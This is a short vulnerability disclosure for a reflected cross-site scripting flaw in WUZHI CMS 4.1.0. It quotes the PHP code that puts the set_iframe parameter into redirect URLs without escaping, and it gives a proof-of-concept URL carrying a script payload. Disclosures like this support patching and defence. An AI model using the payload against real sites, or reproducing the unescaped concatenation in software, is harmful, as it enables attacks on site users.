wuzhicms v4.1.0 set_iframe reflected xss vulnerability

wuzhicms v4.1.0 set_iframe reflected xss vulnerability.md

A xss vulnerability was discovered in WUZHI CMS 4.1.0

There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the set_iframe parameter of /index.php?m=content&f=postinfo&v=listing

Vulnerability file: coreframe/app/content/postinfo.php

function __construct() {
        $this->member = load_class('member', 'member');
        load_function('common', 'member');
        $this->member_setting = get_cache('setting', 'member');
        parent::__construct();
		//判断当前是否验证了邮箱和手机
        if(!$this->memberinfo['ischeck_email']) {
            MSG('请先验证您的邮箱!','?m=member&f=index&v=edit_email&set_iframe='.$GLOBALS['set_iframe'],3000);
        }
		if($this->member_setting['checkmobile'] && !$this->memberinfo['ischeck_mobile']) {
			MSG('您的手机还未验证！请先验证！','index.php?m=member&f=index&v=edit_mobile&set_iframe='.$GLOBALS['set_iframe'],3000);
		}
	}

PoC:

http://example.com/index.php?m=content&f=postinfo&v=listing&set_iframe='-alert(1)-'